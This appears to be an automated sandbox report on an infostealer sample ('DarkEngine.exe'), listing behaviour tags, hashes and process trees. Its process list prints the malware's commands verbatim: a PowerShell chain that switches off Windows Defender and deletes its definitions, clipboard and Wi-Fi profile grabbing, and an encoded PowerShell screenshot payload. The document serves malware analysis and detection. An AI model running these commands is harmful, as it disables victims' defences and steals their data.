Analysis Overview
SHA256
39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00
Threat Level: Shows suspicious behavior
The file 39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Loads dropped DLL
Clipboard Data
Executes dropped EXE
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Looks up external IP address via web service
Command and Scripting Interpreter: PowerShell
Accesses cryptocurrency files/wallets, possible credential harvesting
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Wi-Fi Discovery
Detects videocard installed
Suspicious use of WriteProcessMemory
Gathers system information
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-05 02:39
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-05 02:39
Reported
2024-11-05 02:41
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_1764_133752479593512000\DarkEngine.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_1764_133752479593512000\DarkEngine.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1764 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1764_133752479593512000\DarkEngine.exe |
| PID 1764 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1764_133752479593512000\DarkEngine.exe |
| PID 1764 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1764_133752479593512000\DarkEngine.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
"C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1764_133752479593512000\DarkEngine.exe
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
Network
Files
\Users\Admin\AppData\Local\Temp\onefile_1764_133752479593512000\DarkEngine.exe
| MD5 | a4049a76d21c26ef9017251d9d02a102 |
| SHA1 | ea578987927da1752e4977e922367eea555c02b7 |
| SHA256 | 839f44ebf68fca6a94a9dd13e5d81821f80415eb2436ce021d22889dd46bec50 |
| SHA512 | 1e59b0620882e52a7b2dfc3aaa09d7f7c96a4a22e9668d695c10c6b287493307780ab3b4245846b243ac9f902df74b21cb39369f559677d7a8eaa810a62fd242 |
C:\Users\Admin\AppData\Local\Temp\onefile_1764_133752479593512000\python312.dll
| MD5 | 166cc2f997cba5fc011820e6b46e8ea7 |
| SHA1 | d6179213afea084f02566ea190202c752286ca1f |
| SHA256 | c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546 |
| SHA512 | 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb |
memory/1760-26-0x000000013FD20000-0x0000000140816000-memory.dmp
memory/1764-47-0x000000013F540000-0x000000013FDF0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-05 02:39
Reported
2024-11-05 02:41
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
156s
Command Line
Signatures
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_4840_133752479654089439\DarkEngine.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
"C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_4840_133752479654089439\DarkEngine.exe
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cihps0zm\cihps0zm.cmdline"
C:\Windows\system32\cmd.exe
